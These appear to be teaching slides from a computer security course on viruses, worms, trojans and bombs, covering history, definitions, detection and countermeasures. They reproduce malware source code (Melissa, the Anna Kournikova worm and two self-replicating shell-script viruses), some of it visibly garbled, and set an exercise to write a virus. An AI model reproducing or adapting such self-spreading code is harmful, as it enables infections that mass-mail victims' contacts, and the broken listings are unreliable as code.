Computer Viruses and Worms

PWSP Course Offering

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Malicious Code

Outline

• History
• Virus
• Worms
• Trojan Horse
• Other variants
  – Time Bomb
  – Logic Bomb
  – Rabbit
  – Bacterium
Module 1
Malicious Code: Viruses
Malicious Code: Viruses

Outline

• What is a virus?
• How does it spread?
• How do viruses execute?
• What do viruses exploit?
• What are the controls for viruses?
• How does Anti-Virus work?
• Virus Examples
  – Melissa Virus
  – Shell Script
Viruses & Worms

The Beginning

• In 1988 a "worm program" written by a college student shut down about 10 percent of computers connected to the Internet. This was the beginning of the era of cyber attacks.

• Today we have about 10,000 incidents of cyber attacks which are reported and the number grows.
Viruses & Worms
1994

• A 16-year-old music student called Richard Pryce, better known by the hacker alias Datastream Cowboy, is arrested and charged with breaking into hundreds of computers including those at the Griffiths Air Force base, Nasa and the Korean Atomic Research Institute. His online mentor, "Kuji", is never found.

• Also this year, a group directed by Russian hackers broke into the computers of Citibank and transferred more than $10 million from customers' accounts. Eventually, Citibank recovered all but $400,000 of the pilfered money.
In February, Kevin Mitnick is arrested for a second time. He is charged with stealing 20,000 credit card numbers. He eventually spends four years in jail and on his release his parole conditions demand that he avoid contact with computers and mobile phones.

On November 15, Christopher Pile becomes the first person to be jailed for writing and distributing a computer virus. Mr Pile, who called himself the Black Baron, was sentenced to 18 months in jail.

Viruses & Worms

1999

• In March, the Melissa virus goes on the rampage and wreaks havoc with computers worldwide. After a short investigation, the FBI tracks down and arrests the writer of the virus, a 29-year-old New Jersey computer programmer, David L Smith.

• More than 90 percent of large corporations and government agencies were the victims of computer security breaches in 1999
Viruses & Worms
2000

- In February, some of the most popular websites in the world such as Amazon and Yahoo are almost overwhelmed by being flooded with bogus requests for data.
- In May, the ILOVEYOU virus is unleashed and clogs computers worldwide. Over the coming months, variants of the virus are released that manage to catch out companies that didn't do enough to protect themselves.
- In October, Microsoft admits that its corporate network has been hacked and source code for future Windows products has been seen.
Malicious Code: Viruses
Definition (Webopedia)

• A **computer virus** is malicious code that attaches itself to an executable program or file so it can spread from one computer to another, leaving infections as it travels.

• Computer viruses can range in severity; some viruses cause only mildly annoying effects while others can damage your hardware, software, or files.

• Almost all viruses are attached to an executable file and they cannot infect your computer unless you run or open the malicious program.

• It is important to note that a virus cannot be spread without a human action, (such as running an infected program) to keep it going.

• People continue the spread of a computer virus, by sharing infecting files or sending e-mails with viruses as attachments.
Malicious Code: Viruses

**Definition**

- Definition: Malicious self-replicating software that attaches itself to other software.
- Typical Behavior:
  - Replicates within computer system, potentially attaching itself to every other program
  - Behavior categories: e.g. Innocuous, Humorous, Data altering, Catastrophic
Malicious Code: Viruses

Propagation

• Virus spreads by creating replica of itself and attaching itself to other executable programs to which it has write access.
  – A true virus is not self-propagating and must be passed on to other users via e-mail, infected files/diskettes, programs or shared files

• The viruses normally consist of two parts
  – Replicator: responsible for copying the virus to other executable programs.
  – Payload: Action of the virus, which may be benign such as printing a message or malicious such as destroying data or corrupting the hard disk.
Malicious Code: Viruses

Process

• When a user executes an infected program (an executable file or boot sector), the replicator code typically executes first and then control returns to the original program, which then executes normally.

• Different types of viruses:
  – Polymorphic viruses: Viruses that modify themselves prior to attaching themselves to another program.
  – Macro Viruses: These viruses use an application macro language (e.g., VB or VBScript) to create programs that infect documents and template.
Malicious Code: Viruses
Targets & Prevention

• Vulnerabilities: All computers
• Common Categories:
  – Boot sector Terminate and Stay Resident (TSR)
  – Application software Stealth (or Chameleon)
  – Mutation engine Network Mainframe
• Prevention
  – Limit connectivity
  – Limit downloads
  – Use only authorized media for loading data and software
  – Enforce mandatory access controls. Viruses generally cannot run unless host application is running
Malicious Code: Viruses

Protection

• Detection
  – Changes in file sizes or date/time stamps
  – Computer is slow starting or slow running
  – Unexpected or frequent system failures
  – Change of system date/time
  – Low computer memory or increased bad blocks on disks

• Countermeasures:
  – Contain, identify and recover
  – Anti-virus scanners: look for known viruses
  – Anti-virus monitors: look for virus-related application behaviors
  – Attempt to determine source of infection and issue alert
Malicious Code: Viruses

Virus Detection (Anti-Virus)

- Scanner (conventional scanner, command-line scanner, on-demand scanner) - a program that looks for known viruses by checking for recognisable patterns ('scan strings', 'search strings', 'signatures' [a term best avoided for its ambiguity]).
- Change Detectors/Checksummers/Integrity Checkers - programs that keep a database of the characteristics of all executable files on a system and check for changes which might signify an attack by an unknown virus.
- Cryptographic Checksummers use an encryption algorithm to lessen the risk of being fooled by a virus which targets that particular checksummer.
- Monitor/Behavior Blocker - a TSR that monitors programs while they are running for behavior which might denote a virus.
- TSR scanner - a TSR (memory-resident program) that checks for viruses while other programs are running. It may have some of the characteristics of a monitor and/or behavior blocker.
- Heuristic scanners - scanners that inspect executable files for code using operations that might denote an unknown virus.
• Melissa Virus
  – 1999 (one of the earlier viruses)
  – Spread itself through Microsoft Outlook by emailing itself to all people on address book
  – Infected about 1 million computers
  – Contained only 105 lines of code (in comparison to the millions of code for Windows and other programs)
Malicious Code: Viruses

Melissa Virus Source Code

```vbnet
// Melissa Virus Source Code

Private Sub Document_Open()
On Error Resume Next
If System_PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
    CommandBars("Macro").Controls("Security...").Enabled = False
Else
    CommandBars("Macro").Controls("Security...").Enabled = True
End If
End Sub

Dim UngaDasOutlook, DasMapName, BreakUmOfASlice, 
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapName = UngaDasOutlook.GetNamespace("MAPI")
If System_PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
    UngaDasOutlook.SendMail "... by Kwjibo"
Else
    UngaDasOutlook.SendMail "... by Kwjibo"
End If

For y = 1 To DasMapName.AddressLists.Count
    Set AddyBook = DasMapName.AddressLists(y)
    x = 1
    For c = 1 To AddyBook.AddressEntries.Count
        Peep = AddyBook.AddressEntries(c)
        BreakUmOfASlice = UngaDasOutlook.CreateItem(0)
        BreakUmOfASlice.Subject = "Important Message From" & Application.UserName
        BreakUmOfASlice.Body = "Here is that document you asked for... don't show anyone else " 
        BreakUmOfASlice.Attachments.Add ActiveDocument.FullName
        BreakUmOfASlice.Send
        Peep = ""
    Next c
Next y
DasMapName.Logoff
```

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Malicious Code: Viruses

Virus Example

• This virus example (shell script) has only 6 lines of code in comparison to the 105 lines of the Melissa Virus.

```bash
#!/bin/sh
for i in *
do if test x `"$i"`
then cp $o $i
fi
done
```

• The script looks at each file in the current directory and tests if the file is an executable. All executables are replaced with a copy of this virus file.

Malicious Code: Viruses

Virus Example Extension

• The previous can be extended by:
  1. Adding more elaborate searches
  2. Leaving the original file intact, but adding the virus at the end of it

• Sample Code
  ```sh
  #!/bin/sh
  for i in * #virus#
  do
    case "`sed 1q$I'" in
      "#!/bin/sh"
        sed n #virus#/,$p $o ?? $i
      esac
  done
  ```

• Steps:
  1. It virus searches for any file which is a shell script (searches #!/bin/sh string)
  2. It copies itself to the end of the file.
  3. The next time the script is run, the virus will be run as well.

• Viruses can also be made useful
  – e.g. the example virus could be modified to verify if the file was already infected.
Malicious Code: Viruses

Questions 1 and 2

1) What are viruses?

2) How do viruses spread?
Malicious Code: Viruses

Questions 3 and 4

3) What are some controls that could be implemented for viruses?

4) What are the different types of virus detection?
Malicious Code: Viruses

Question 5

• Write a virus (given the two earlier examples) that could monitor an executable's usage and automatically compress executables which have not been used after an extended period of time.

• This will help you understand the level of sophistication needed to actually create a virus.
Module 2
Malicious Code: Worms and Variants
Malicious Code: Worms and Variants

Worms (Webopedia)

• A **worm** is similar to a virus by its design, and is considered to be a sub-class of a virus. Worms spread from computer to computer, but unlike a virus, it has the ability to travel without any help from a person.

• A worm takes advantage of file or information transport features on your system, which allows it to travel unaided. The biggest danger with a worm is its ability to replicate itself on your system, so rather than your computer sending out a single worm, it could send out hundreds or thousands of copies of itself, creating a huge devastating effect.

• One example would be for a worm to send a copy of itself to everyone listed in your e-mail address book. Then, the worm replicates and sends itself out to everyone listed in each of the receiver's address book, and the manifest continues on down the line. Due to the copying nature of a worm and its ability to travel across networks the end result in most cases is that the worm consumes too much system memory (or network bandwidth), causing Web servers, network servers, and individual computers to stop responding.

• In more recent worm attacks such as the much talked about .Blaster Worm., the worm has been designed to tunnel into your system and allow malicious users to control your computer remotely.
Malicious Code: Worms and Variants

Worms

• Worms are another form of self-replicating programs that can automatically spread.
  – They do not need a carrier program
  – Replicate by spawning copies of themselves.
  – More complex and are much harder to write than the virus programs.

• Definition: Malicious software which is a stand-alone application (i.e. can run without a host application)
  – Unlike the viruses they do not need a carrier program and they replicate by spawning copies of themselves.
  – They are more complex and are much harder to write than the virus programs.

• Typical Behavior: Often designed to propagate through a network, rather than just a single computer
Malicious Code: Worms and Variants

Worm Prevention & Detection

- Vulnerabilities: Multitasking computers, especially those employing open network standards
- Prevention:
  - Limit connectivity
  - Employ Firewalls
- Detection:
  - Computer is slow starting or slow running
  - Unexpected or frequent system failures
- Countermeasures
  - Contain, identify and recover
  - Attempt to determine source of infection and issue alert
Malicious Code: Worms and Variants

Worm Examples

• In November of 1988, a self propagating worm known as the Internet Worm was released onto the ARPANET by Robert Morris Jr. It 'attached' itself to the computer system rather than a program.

• Process:
  – The worm obtained a new target machine name from the host it had just infected and then attempted to get a shell program running on the target machine. The virus used several means to get the shell program running.
  – It primarily exploited a bug in the sendmail routine (a debug option left enabled in the program release) and a bug in the 'finger' routine.
Malicious Code: Worms and Variants

Worm Examples, cont’d.

- The shell program served as a beach head and used several programs that downloaded password cracking programs.
- A common password dictionary and the system dictionary were used for password cracking.
- The virus then attacked a new set of target hosts using any cracked accounts it may have obtained from the current host.
  - The virus was not intended to be malicious and did not harm any data on the systems it infected.
  - A bug prevented the worm from always checking to tell if a host was infected causing the worm to overload the host computers it infected.
Malicious Code: Worms and Variants

Worm Examples, cont’d.

• ILOVEYOU worm in 2000 automatically emailed itself to the first 200 entries in the outlook address book
  – The worm spread to 10 million computers in two days which were required to create a patch for it
  – It cost billions of dollars to repair the damage
• CodeRed, Nimبدا, SirCam are other worms each of which cost upwards of 500 million dollars in damages
• Sometimes worms take a long time to spread
  – Anna Kournikova worm was discovered in August 2000 and became a serious threat in February 2001
  – Compare the Anna Kournikova worm code to the Melissa Virus code shown earlier.
Malicious Code: Worms and Variants

Anna Kournikova Worm Source Code

```
On Error Resume Next
Set WScriptShell = CreateObject("WScript.Shell")
WScriptShell.run "HKCU\software\OnTheFly", "Worm made with Vbsw 1.50b"
Set FileSystemObject = CreateObject("scripting.filesystemobject")
FileSystemObject.copyfile wscript.scriptfullname.FileSystemObject.GetSpecialFolder(0) & "\AnnaKournikova.jpg.vbs"
If WScriptShell.run("HKCU\software\OnTheFly\mailed") <> "1" then
doMail()
end if
If month(now) = 1 And day(now) = 26 then
WScriptShell.run "http://www.dynabyte.nl", 3, false
end if
Set thisScript = FileSystemObject.opentextfile(wscript.scriptfullname, 1)
thisScriptText = thisScript.ReadAll
thisScript.Close
Do
If Not FileSystemObject.fileexists(wscript.scriptfullname) Then
Set newFile = FileSystemObject.createtextfile(wscript.scriptfullname, True)
newFile.write thisScriptText
newFile.Close
End If
Loop
Function doMail()
On Error Resume Next
Set OutlookApp = CreateObject("Outlook.Application")
If OutlookApp = "Outlook" Then
Set MAPINamespace = OutlookApp.GetNamespace("MAPI")
Set addressLists = MAPINamespace.AddressLists
For Each address In addressLists
If address.AddressEntries.Count <> 0 Then
entryCount = address.AddressEntries.Count
For i = 1 To entryCount
Set newItem = OutlookApp.CreateItem(0)
Set currentAddress = address.AddressEntries(i)
newItem.To = currentAddress.Address
newItem.Subject = "Here you have, :)
newItem.Body = "Hi" & vbCrLf & "Check This!" & vbCrLf & ""
set attachments = newItem.Attachments
attachments.Add FileSystemObject.GetSpecialFolder(0) & "\AnnaKournikova.jpg.vbs"
newItem.DeletewithSubfolders = True
If newItem.To <> "" Then
newItem.Send
WScriptShell.runwrite "HKCU\software\OnTheFly\mailed", "1"
End If
Next
End If
Next
End Function
```

"Vbsw 1.50b"

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Malicious Code: Worms and Variants

Trojan Horse (Webopedia)

• A **Trojan Horse** appears to be useful software and does damage once installed or run on your computer. Users are usually tricked into opening them because they appear to be receiving legitimate software or files from a legitimate source.

• When a Trojan is activated on your computer, the results can vary. Some Trojans are designed to be more annoying than malicious (like changing your desktop, adding silly active desktop icons) or they can cause serious damage by deleting files and destroying information on your system.

• Trojans are also known to create a backdoor on your computer that gives malicious users access to your system, possibly allowing confidential or personal information to be compromised. Unlike viruses and worms, Trojans do not reproduce by infecting other files nor do they self-replicate.
Malicious Code: Worms and Variants

**Trojan Horse**

- Definition: a worm which pretends to be a useful program or a virus which is purposely attached to a useful program prior to distribution
- Typical Behaviors: Same as Virus or Worm, but also sometimes used to send information back to or make information available to perpetrator
- Vulnerabilities:
  - Trojan Horses require user cooperation for executing their payload
  - Untrained users are vulnerable
- Prevention:
  - User cooperation allows Trojan Horses to bypass automated controls thus user training is best prevention
- Detection: Same as Virus and Worm
- Countermeasures:
  - Same as Virus and Worm
  - An alert must be issued, not only to other system admins, but to all network users
Malicious Code: Worms and Variants

Time Bomb

• Definition: A Virus or Worm designed to activate at a certain date/time
• Typical Behaviors: Same as Virus or Worm, but widespread throughout organization upon trigger date
• Vulnerabilities:
  – Same as Virus and Worm
  – Time Bombs are usually found before the trigger date
• Prevention:
  – Run associated anti-viral software immediately as available
• Detection:
  – Correlate user problem reports to find patterns indicating possible Time Bomb
• Countermeasures:
  – Contain, identify and recover
  – Attempt to determine source of infection and issue alert
Malicious Code: Worms and Variants

Logic Bomb

• Definition:
  – A Virus or Worm designed to activate under certain conditions

• Typical Behaviors:
  – Same as Virus or Worm

• Vulnerabilities:
  – Same as Virus and Worm

• Prevention:
  – Same as Virus and Worm

• Detection:
  – Correlate user problem reports indicating possible Logic Bomb

• Countermeasures:
  – Contain, identify and recover
  – Determine source and issue alert
Malicious Code: Worms and Variants

Rabbit

• Definition:
  – A worm designed to replicate to the point of exhausting computer resources

• Typical Behaviors:
  – Rabbit consumes all CPU cycles, disk space or network resources, etc.

• Vulnerabilities:
  – Multitasking computers, especially those on a network

• Prevention:
  – Limit connectivity
  – Employ Firewalls

• Detection:
  – Computer is slow starting or running
  – Frequent system failures

• Countermeasures:
  – Contain, identify and recover
  – Determine source and issue alert
Malicious Code: Worms and Variants

Bacterium

• Definition:
  – A virus designed to attach itself to the OS in particular (rather than any application in general) and exhaust computer resources, especially CPU cycles

• Typical Behaviors:
  – Operating System consumes more and more CPU cycles, resulting eventually in noticeable delay in user transactions

• Vulnerabilities:
  – Older versions of operating systems are more vulnerable than newer versions since hackers have had more time to write Bacterium

• Prevention:
  – Limit write privileges and opportunities to OS files
  – System administrators should work from non-admin accounts whenever possible.

• Detection:
  – Changes in OS file sizes, date/time stamps
  – Computer is slow in running
  – Unexpected or frequent system failures

• Countermeasures
  – Anti-virus scanners: look for known viruses
  – Anti-virus monitors: look for virus-related system behaviors
Malicious Code: Worms and Variants
Questions 1 and 2

1) What is a worm?

2) What is the main difference between a worm and a virus?
Malicious Code: Worms and Variants

Questions 3 and 4

3) What are some controls for worms?

4) When comparing the source code for the worm to the virus, what do you notice?
Malicious Code: Worms and Variants

Question 5

5) Define:
   a. Trojan Horse
   b. Time Bomb
   c. Logic Bomb
   d. Rabbit
   e. Bacterium